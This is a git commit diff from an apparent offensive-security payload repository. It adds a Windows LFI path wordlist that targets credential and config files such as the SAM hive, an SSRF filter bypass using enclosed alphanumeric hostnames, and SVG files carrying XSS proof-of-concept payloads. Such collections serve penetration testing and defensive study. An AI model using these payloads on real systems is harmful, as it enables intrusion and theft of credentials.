SVG XSS + SSRF enclosed alphanumerics

2025-02-20 13:46:05 +00:00 · 2017-11-19 14:01:36 +01:00 · 2017-11-19 14:01:36 +01:00 · fea88a5738
commit fea88a5738
parent f740d8e825
8 changed files with 83 additions and 63 deletions
--- a/Traversal/Intruders/LFI-WindowsFileCheck.txt
+++ b/Traversal/Intruders/LFI-WindowsFileCheck.txt
@ -2,67 +2,68 @@ php://input
 C:\boot.ini
 C:\WINDOWS\win.ini
 C:\WINDOWS\php.ini
+C:\WINDOWS\System32\Config\SAM
 C:\WINNT\php.ini
-\xampp\phpMyAdmin\config.inc
-\xampp\phpMyAdmin\phpinfo.php
-\xampp\phpmyadmin\config.inc
-\xampp\phpmyadmin\phpinfo.php
-\xampp\phpmyadmin\config.inc.php
-\xampp\phpMyAdmin\config.inc.php
-\xampp\apache\conf\httpd.conf
-\xampp\FileZillaFTP\FileZilla Server.xml
-\xampp\MercuryMail\mercury.ini
-\mysql\bin\my.ini
-\xampp\php\php.ini
-\xampp\phpMyAdmin\config.inc.php
-\xampp\tomcat\conf\tomcat-users.xml
-\xampp\tomcat\conf\web.xml
-\xampp\sendmail\sendmail.ini
-\xampp\webalizer\webalizer.conf
-\xampp\webdav\webdav.txt
-\xampp\apache\logs\error.log
-\xampp\apache\logs\access.log
-\xampp\FileZillaFTP\Logs
-\xampp\FileZillaFTP\Logs\error.log
-\xampp\FileZillaFTP\Logs\access.log
-\xampp\MercuryMail\LOGS\error.log
-\xampp\MercuryMail\LOGS\access.log
-\xampp\mysql\data\mysql.err
-\xampp\sendmail\sendmail.log
-\apache\log\error.log
-\apache\log\access.log
-\apache\log\error_log
-\apache\log\access_log
-\apache2\log\error.log
-\apache2\log\access.log
-\apache2\log\error_log
-\apache2\log\access_log
-\log\error.log
-\log\access.log
-\log\error_log
-\log\access_log
-\apache\logs\error.log
-\apache\logs\access.log
-\apache\logs\error_log
-\apache\logs\access_log
-\apache2\logs\error.log
-\apache2\logs\access.log
-\apache2\logs\error_log
-\apache2\logs\access_log
-\logs\error.log
-\logs\access.log
-\logs\error_log
-\logs\access_log
-\log\httpd\access_log
-\log\httpd\error_log
-\logs\httpd\access_log
-\logs\httpd\error_log
-\opt\xampp\logs\access_log
-\opt\xampp\logs\error_log
-\opt\xampp\logs\access.log
-\opt\xampp\logs\error.log
-\Program Files\Apache Group\Apache\logs\access.log
-\Program Files\Apache Group\Apache\logs\error.log
-\Program Files\Apache Group\Apache\conf\httpd.conf
-\Program Files\Apache Group\Apache2\conf\httpd.conf
-\Program Files\xampp\apache\conf\httpd.conf
+C:\xampp\phpMyAdmin\config.inc
+C:\xampp\phpMyAdmin\phpinfo.php
+C:\xampp\phpmyadmin\config.inc
+C:\xampp\phpmyadmin\phpinfo.php
+C:\xampp\phpmyadmin\config.inc.php
+C:\xampp\phpMyAdmin\config.inc.php
+C:\xampp\apache\conf\httpd.conf
+C:\xampp\FileZillaFTP\FileZilla Server.xml
+C:\xampp\MercuryMail\mercury.ini
+C:\mysql\bin\my.ini
+C:\xampp\php\php.ini
+C:\xampp\phpMyAdmin\config.inc.php
+C:\xampp\tomcat\conf\tomcat-users.xml
+C:\xampp\tomcat\conf\web.xml
+C:\xampp\sendmail\sendmail.ini
+C:\xampp\webalizer\webalizer.conf
+C:\xampp\webdav\webdav.txt
+C:\xampp\apache\logs\error.log
+C:\xampp\apache\logs\access.log
+C:\xampp\FileZillaFTP\Logs
+C:\xampp\FileZillaFTP\Logs\error.log
+C:\xampp\FileZillaFTP\Logs\access.log
+C:\xampp\MercuryMail\LOGS\error.log
+C:\xampp\MercuryMail\LOGS\access.log
+C:\xampp\mysql\data\mysql.err
+C:\xampp\sendmail\sendmail.log
+C:\apache\log\error.log
+C:\apache\log\access.log
+C:\apache\log\error_log
+C:\apache\log\access_log
+C:\apache2\log\error.log
+C:\apache2\log\access.log
+C:\apache2\log\error_log
+C:\apache2\log\access_log
+C:\log\error.log
+C:\log\access.log
+C:\log\error_log
+C:\log\access_log
+C:\apache\logs\error.log
+C:\apache\logs\access.log
+C:\apache\logs\error_log
+C:\apache\logs\access_log
+C:\apache2\logs\error.log
+C:\apache2\logs\access.log
+C:\apache2\logs\error_log
+C:\apache2\logs\access_log
+C:\logs\error.log
+C:\logs\access.log
+C:\logs\error_log
+C:\logs\access_log
+C:\log\httpd\access_log
+C:\log\httpd\error_log
+C:\logs\httpd\access_log
+C:\logs\httpd\error_log
+C:\opt\xampp\logs\access_log
+C:\opt\xampp\logs\error_log
+C:\opt\xampp\logs\access.log
+C:\opt\xampp\logs\error.log
+C:\Program Files\Apache Group\Apache\logs\access.log
+C:\Program Files\Apache Group\Apache\logs\error.log
+C:\Program Files\Apache Group\Apache\conf\httpd.conf
+C:\Program Files\Apache Group\Apache2\conf\httpd.conf
+C:\Program Files\xampp\apache\conf\httpd.conf
--- a/injection/Parser
+++ b/injection/Parser
--- a/injection/README.md
+++ b/injection/README.md
@ -91,6 +91,15 @@ requests + browsers : 2.2.2.2
 urllib : 3.3.3.3
 ```

+Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)
+```
+http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
+
+List:
+① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
+```
+
+
 ## SSRF via URL Scheme
 Dict://   
 The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
@ -176,7 +185,9 @@ http://0251.00376.000251.0000376/ Dotted octal with padding
 * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
 * [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
 * [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
+* [#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk)
 * [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
 * [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
 * [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
 * [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
+* [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
--- a/injection/SSRF_Parser.png
+++ b/injection/SSRF_Parser.png
--- a/injection/Files/SVG_XSS1.svg
+++ b/injection/Files/SVG_XSS1.svg
@ -0,0 +1 @@
+<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
--- a/injection/Files/SVG_XSS2.svg
+++ b/injection/Files/SVG_XSS2.svg
@ -0,0 +1 @@
+<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
--- a/injection/Files/SVG_XSS3.svg
+++ b/injection/Files/SVG_XSS3.svg
@ -0,0 +1 @@
+<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
--- a/injection/README.md
+++ b/injection/README.md
@ -178,6 +178,11 @@ XSS in SVG
 XSS in SVG (short)
 ```
 <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
+
+
+<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
+<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
+<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
 ```

 XSS in SWF
				`@ -0,0 +1 @@`
				`<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>`
				`@ -0,0 +1 @@`
				`<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>`
				`@ -0,0 +1 @@`
				`<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>`